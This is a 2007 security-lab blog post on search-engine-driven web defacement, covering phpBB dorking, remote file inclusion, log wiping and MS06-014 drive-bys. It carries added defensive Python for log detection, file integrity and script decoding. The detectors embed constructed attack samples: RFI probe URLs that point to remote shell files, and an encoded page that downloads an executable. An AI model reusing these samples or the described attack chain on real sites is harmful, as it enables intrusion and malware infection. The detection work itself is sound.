Automated Defacement through Search Engines
04.02.2007 - 11:09 AM
The question is: how do attackers find Web applications that are vulnerable to such attacks? The answer is: by using the Internet's search engines to do the legwork. This is not a new technique, but lately we've seen it incorporated in malicious scripts and malware.
This week, I examine some of the automated tools used for Web site defacements, where the key element in the operation is the use of a search engine.
Search Engine + IRC = True
This first example shows how a malicious script uses Google for its mining process. Other search engines are commonly used as well.
The process starts with a script that sends queries to Google built from known search operators (so-called Google dorks) to discover Web servers that host a specific Web application.
[Screenshot of the search script; not reproduced in this copy]
The script above targets phpBB, looking for that specific Web application by searching for “Powered by phpBB”, the footer text the software places on every page. phpBB is an extremely popular open source bulletin board introduced in 2000, and vulnerabilities uncovered throughout its development are actively exploited in the wild.
If a host is discovered, the script runs a list of exploits written for that Web application, each one probing for a parameter that is vulnerable to remote file inclusion. If an attack succeeds, the script sends commands to a remote IRC server, notifying the attacker that a vulnerable host has been found.
[Screenshot of the IRC notification; not reproduced in this copy]
The attacker now uses that information to inject a remote shell through the same parameter. The included code is parsed and executed by the server, giving the intruder control of the Web server with the privileges of the Web server process.
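The probing step described above leaves a recognisable trace in the Web server's access log: a query parameter whose value is a full remote URL, often with a trailing question mark so that whatever the vulnerable script appends is treated as part of the query string of the attacker's URL. The Python script below is an added example, not code from the original post or from any of the tools it describes. It parses a handful of constructed Apache log lines and reports such RFI probes; the log lines, IP addresses, parameter names and the list of scanner user agents are all assumptions made for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache "combined"-format lines for this example (not real traffic).
# Lines 2 and 3 carry a full URL in a query parameter, which is what an RFI probe looks like.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Apr/2007:11:09:00 +0000] "GET /forum/index.php HTTP/1.1" 200 4123 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [02/Apr/2007:11:09:01 +0000] "GET /forum/viewtopic.php?t=12&page=http://203.0.113.9/cmd.txt? HTTP/1.0" 200 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [02/Apr/2007:11:09:02 +0000] "GET /forum/includes/functions.php?root=ftp://198.51.100.20/shell.txt HTTP/1.0" 404 298 "-" "libwww-perl/5.805"
203.0.113.5 - - [02/Apr/2007:11:09:03 +0000] "GET /forum/viewtopic.php?t=12&start=15 HTTP/1.1" 200 3877 "http://forum.example/forum/index.php" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.5 - - [02/Apr/2007:11:09:04 +0000] "GET /forum/login.php?redirect=/forum/viewtopic.php HTTP/1.1" 302 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
"""

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A parameter value that is itself a remote URL is the core RFI signature.
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# User agents typical of scripted scanners of the period; an assumption, tune for your environment.
SCANNER_AGENTS = ("libwww-perl", "lwp-trivial", "Wget", "curl")


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi_attempts(log_text):
    """Scan log text and return one finding per query parameter that carries a remote URL."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        target = urlsplit(rec["target"])
        # parse_qsl percent-decodes values, so an encoded %00 shows up as a real null byte.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if not REMOTE_URL_RE.match(value):
                continue
            indicators = ["remote_url"]
            if value.endswith("?"):
                indicators.append("trailing_question_mark")
            if "\x00" in value:
                indicators.append("null_byte")
            if rec["ua"].startswith(SCANNER_AGENTS):
                indicators.append("scanner_user_agent")
            findings.append({
                "ip": rec["ip"], "time": rec["time"], "status": rec["status"],
                "path": target.path, "parameter": name,
                "remote_host": urlsplit(value).hostname, "indicators": indicators,
            })
    return findings


def summarize_by_source(findings):
    """Count probes per source address, which is how a scanning bot stands out."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f["ip"], f["path"], f["parameter"], "->", f["remote_host"], ", ".join(f["indicators"]))
    print(summarize_by_source(find_rfi_attempts(SAMPLE_LOG)))
```

A 404 on the probed script is still worth recording: the bot will move on to the next exploit in its list, and the source address is the same for all of them. On the server side, the fix for this class of bug is never to pass user input to include() or require(), and on PHP 5.2 and later to leave allow_url_include off; an egress rule that stops the Web server from opening outbound IRC connections breaks the notification step even when a probe succeeds.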
Actions
After a vulnerable host is found through a search engine, the attacker can inject scripting code through the vulnerable parameter. Here is an example of a script that is often injected:
[Screenshot of the injected script; not reproduced in this copy]
The script walks the server's entire directory structure, mapping out the existing files. It locates the main Web page and defaces it. After that is done, it uses the information gathered in the first step to delete log and system files, erasing any trace of the defacement.
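The three steps just described (map the tree, replace the main page, delete the logs) are exactly what a file-integrity check catches, provided the baseline was taken beforehand and is stored where the intruder cannot reach it. The Python example below is added here and is not code from the original post. It builds a small site in a temporary directory, baselines it, replays the three attacker actions, and reports what changed; the file names and contents are constructed for the example.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path, chunk_size=65536):
    """SHA-256 of a file, read in chunks so large files are not loaded whole into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map every file under root (path relative to root, POSIX style) to its digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def check_against_baseline(root, baseline):
    """Compare the tree under root with a previously stored baseline.

    Returns the files whose content changed (defacement), the files that vanished
    (log wiping) and the files that appeared (dropped shells or exploit pages).
    """
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def demo():
    """Build a tiny site, baseline it, then replay the attacker actions from the post."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "htdocs").mkdir()
        (root / "logs").mkdir()
        # Constructed site content for the example.
        (root / "htdocs" / "index.html").write_text("<h1>Welcome to the forum</h1>\n")
        (root / "htdocs" / "about.html").write_text("<p>About us</p>\n")
        (root / "logs" / "access.log").write_text(
            '203.0.113.5 - - [02/Apr/2007:11:09:00 +0000] "GET /index.html HTTP/1.1" 200 31\n')
        baseline = build_baseline(root)

        # Simulated attacker actions, in the order the injected script performs them.
        (root / "htdocs" / "index.html").write_text("<h1>Owned</h1>\n")          # deface main page
        (root / "htdocs" / "shell.php").write_text("<?php /* dropped shell */ ?>\n")  # drop a shell
        (root / "logs" / "access.log").unlink()                                   # wipe the log

        return check_against_baseline(root, baseline)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Keep the baseline, and a copy of the logs, off the host: a script that deletes the access log will delete a baseline file sitting next to it just as happily, so ship logs to a remote syslog server and store the digests on a machine the Web server cannot write to.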
From fun to profit
In the past, defacing was often done for fun and to show off. Even though large corporate Web sites were defaced, the victims simply had to fix the defaced page, and they would be back online again.
Some of our latest research shows that it's no longer so innocent, because attackers embed Web exploits in the defaced page. Even though a corporation can fix the problem fairly quickly, thousands of visitors' computers may already be infected by then. One example is this defaced Web site:
[Screenshot of the defaced site; not reproduced in this copy]
This site looks like any other defaced Web site you may have encountered, but the difference is significant: it is spreading malware. Looking at the source code of the page shows that it's up to no good.
The first thing we notice is the encoded JavaScript:
[Screenshot of the encoded JavaScript; not reproduced in this copy]
After decoding the script, we see that it tries to exploit the MS06-014 vulnerability (the MDAC RDS.Dataspace ActiveX flaw) to download an executable file to the victim's computer.
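Decoding such a script by hand is tedious, and the indicator worth keying on in the decoded output is the class ID of the RDS.DataSpace control that MS06-014 exploits instantiate. The Python script below is an added example, not the original post's code or the actual page it analysed. It undoes the two most common encodings of the period (unescape("%XX") strings and String.fromCharCode(...) sequences), then checks the plaintext for that class ID, a CreateObject() call and any URL ending in .exe. The sample HTML and the download URL are constructed for the example; real samples may use other encodings that this decoder does not handle.

```python
import re

# Class ID of the MDAC RDS.DataSpace control that MS06-014 exploit pages instantiate.
RDS_DATASPACE_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"

# Constructed defaced page: a String.fromCharCode() URL and an unescape()-wrapped exploit body.
SAMPLE_HTML = (
    "<html><body><h1>Owned</h1><script>"
    "var u=String.fromCharCode(104,116,116,112,58,47,47,50,48,51,46,48,46,49,49,51,"
    "46,57,47,108,111,97,100,46,101,120,101);"
    'document.write(unescape("%3Cscript%3E'
    "var%20o%3Ddocument.createElement%28%22object%22%29%3B"
    "o.setAttribute%28%22classid%22%2C%22clsid%3ABD96C556-65A3-11D0-983A-00C04FC29E36%22%29%3B"
    "var%20x%3Do.CreateObject%28%22Microsoft.XMLHTTP%22%2C%22%22%29%3B"
    "x.Open%28%22GET%22%2Cu%2C0%29%3Bx.Send%28%29%3B"
    '%3C/script%3E"));'
    "</script></body></html>"
)
# A plain defacement with harmless encoded markup, for comparison.
BENIGN_HTML = (
    '<html><body><h1>Owned</h1><script>document.write(unescape("%3Cb%3EHi%3C/b%3E"));'
    "</script></body></html>"
)

PCT_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
UNESCAPE_CALL_RE = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.DOTALL)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
EXE_URL_RE = re.compile(r"""https?://[^\s"'<>()]+\.exe\b""", re.IGNORECASE)


def js_unescape(s):
    """Decode the %XX and %uXXXX sequences that JavaScript's unescape() understands."""
    return PCT_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_layers(text, max_rounds=10):
    """Replace unescape("...") and String.fromCharCode(...) calls with their plaintext.

    Obfuscated pages often nest one encoding inside another, so repeat until
    nothing changes (bounded, so a pathological input cannot loop forever).
    """
    for _ in range(max_rounds):
        new = UNESCAPE_CALL_RE.sub(lambda m: js_unescape(m.group(2)), text)
        new = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), new)
        if new == text:
            break
        text = new
    return text


def scan_for_ms06014(html):
    """Decode the page and report the static indicators of an MS06-014 drive-by."""
    decoded = decode_layers(html)
    return {
        "rds_dataspace_clsid": RDS_DATASPACE_CLSID.lower() in decoded.lower(),
        "createobject": "CreateObject(" in decoded,
        "exe_urls": EXE_URL_RE.findall(decoded),
        "decoded": decoded,
    }


if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        r = scan_for_ms06014(page)
        print(label, r["rds_dataspace_clsid"], r["createobject"], r["exe_urls"])
```

The class ID check is the robust one: the URL of the dropped executable changes from campaign to campaign, and the encoding changes whenever the packer does, but the control the exploit needs to instantiate does not. Running the decoder over the defaced page's source lets a responder see what the script did without rendering it in a vulnerable browser.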

Look what I have done!
Most of the people behind these defacements report their accomplishments to the online defacement archive Zone-H.org. We've even found customized software written by attackers so that they can submit a large number of URLs at once.
[Screenshot of the submission tool; not reproduced in this copy]
Conclusion
It's clear that search engines are a key element in the mining and information-gathering process. The increase in published scripts and tools for Web site defacement is a good indication of this. It is also a reminder that everyone is a potential target, not only large corporations.
It's ironic that the malicious tools and scripts in this blog were all found through search engines. Even though the attackers know how to exploit functionality in search engines to the fullest, that doesn't necessarily mean that they keep themselves away from a search engine's prying eyes.
Researcher: Preben Nylokken, Websense Security Labs